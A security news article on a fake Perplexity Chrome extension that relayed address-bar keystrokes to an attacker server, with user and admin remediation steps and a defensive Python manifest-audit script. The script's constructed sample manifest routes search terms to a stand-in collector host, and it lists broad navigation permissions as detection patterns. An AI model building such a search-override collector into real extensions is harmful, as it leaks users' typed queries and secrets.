Fake Perplexity Extension Siphoned Every Chrome Address Bar Keystroke
Microsoft researchers flagged a counterfeit Perplexity Chrome extension that piped queries and omnibox input to an attacker server before completing the search.

A Chrome extension impersonating Perplexity's AI search tool was quietly logging every query and every character typed into the address bar, routing the data through an attacker-controlled server before users ever saw a results page.
Microsoft researchers identified the extension and disclosed it to Google, which has since pulled it from the Chrome Web Store.
The abuse pattern is worth pausing on. This wasn't a passive credential stealer. The extension acted as a man-in-the-middle for the omnibox itself, intercepting keystrokes as they were typed, forwarding them out, and only then redirecting the user to the legitimate search destination. From the victim's perspective, the browser behaved normally.
What that means in practice: anything typed into the URL bar (internal hostnames, partially-typed session URLs, query strings containing tokens, draft questions to a chatbot, the half-typed name of an employer or medical condition) was exfiltrated character by character.
Microsoft has not publicly disclosed the number of installs, the duration the extension was live, or the geography of the command-and-control infrastructure at time of writing. The company attributes the discovery to its own threat research team rather than an external reporter.
This fits a pattern Threat Vectr has tracked through 2024 and 2025: extension stores being used as a low-friction distribution channel for surveillanceware that mimics popular AI brands. Perplexity, ChatGPT, Claude and Gemini have all been impersonated in browser add-ons over the past eighteen months. The brand recognition does the social-engineering work for the attacker.
Jurisdiction here is messy. There is no formal breach-notification trigger for an extension-store takedown, because Google is not a data controller for the exfiltrated content and Microsoft is the discoverer, not the custodian. Affected users will likely never receive a notice. In the EU and UK, if any of the intercepted queries contained personal data tied to an identifiable individual, the operator of the extension would be the controller — and unreachable.
What affected users should do
If you installed a Perplexity-branded Chrome extension from a third-party publisher in recent months, assume your browsing telemetry was exposed. Remove the extension, then audit chrome://extensions for anything you don't recognise. Rotate credentials for any service where you may have typed a session-bearing URL or token into the address bar. Check chrome://settings/syncSetup to confirm synced data hasn't propagated the extension to other devices on the same Google account.
For enterprise admins: pull extension inventory from your endpoint management console and block install-by-ID for the offending package once Microsoft publishes the manifest hash. Force-install policies via Chrome Enterprise are the cleanest mitigation against future lookalikes.
Verify the real Perplexity extension by publisher identity, not by name or icon. Both are trivially cloneable.
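An added example for the audit steps above, not code from Microsoft, Google or Perplexity: it walks a Chrome profile's Extensions directory and flags manifests that declare documented keys touching search, the omnibox or navigation, escalating when the display name also uses an AI brand on an extension ID you have not verified. The article does not say which mechanism the fake extension used; the keys checked, TRUSTED_IDS, SAMPLE and collector.example are assumptions chosen for illustration.

```python
import json, re
from pathlib import Path

BRANDS = ("perplexity", "chatgpt", "claude", "gemini")  # brands the article lists
TRUSTED_IDS = set()  # assumption: extension IDs you have verified by publisher
BROAD = {"<all_urls>", "*://*/*", "webRequest", "webNavigation"}
# Constructed sample manifest, not taken from the real extension.
SAMPLE = {"name": "Perplexity AI Search", "permissions": ["webNavigation"], "chrome_settings_overrides":
          {"search_provider": {"suggest_url": "https://collector.example/s?q={searchTerms}"}}}

def display_name(manifest, ext_dir):
    """Resolve a localized __MSG_key__ name through _locales/<default_locale>."""
    name = manifest.get("name", "")
    m = re.fullmatch(r"__MSG_(.+)__", name)
    path = Path(ext_dir, "_locales", manifest.get("default_locale", "en"), "messages.json")
    try:
        msgs = json.loads(path.read_text("utf-8-sig")) if m else {}
    except (OSError, ValueError):
        msgs = {}
    hits = [v.get("message", name) for k, v in msgs.items() if k.lower() == m.group(1).lower()]
    return hits[0] if hits else name

def audit(manifest, ext_dir, ext_id):
    """Findings for one unpacked extension; an empty list means nothing flagged."""
    out = []
    sp = manifest.get("chrome_settings_overrides", {}).get("search_provider", {})
    out += [f"search override {k} -> {sp[k]}" for k in ("search_url", "suggest_url") if k in sp]
    if "omnibox" in manifest:
        out.append(f"omnibox keyword {manifest['omnibox'].get('keyword')!r}")
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    broad = sorted(BROAD & {p for p in perms if isinstance(p, str)})
    if broad:
        out.append("navigation visibility: " + ", ".join(broad))
    name = display_name(manifest, ext_dir).lower()
    if out and ext_id not in TRUSTED_IDS and any(b in name for b in BRANDS):
        out.insert(0, "AI brand name on an unverified extension ID")
    return out

def scan(root):
    """Walk <root>/<extension id>/<version>/manifest.json (Chrome's per-profile layout)."""
    report = {}
    for mf in Path(root).glob("*/*/manifest.json"):
        try:
            found = audit(json.loads(mf.read_text("utf-8-sig")), mf.parent, mf.parent.parent.name)
        except (OSError, ValueError, TypeError, AttributeError):
            found = ["manifest unreadable, inspect by hand"]
        if found:
            report[mf.parent.parent.name] = found
    return report
```

Call scan() on a profile's Extensions directory and treat the findings as leads for manual review; many legitimate extensions declare the same keys.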



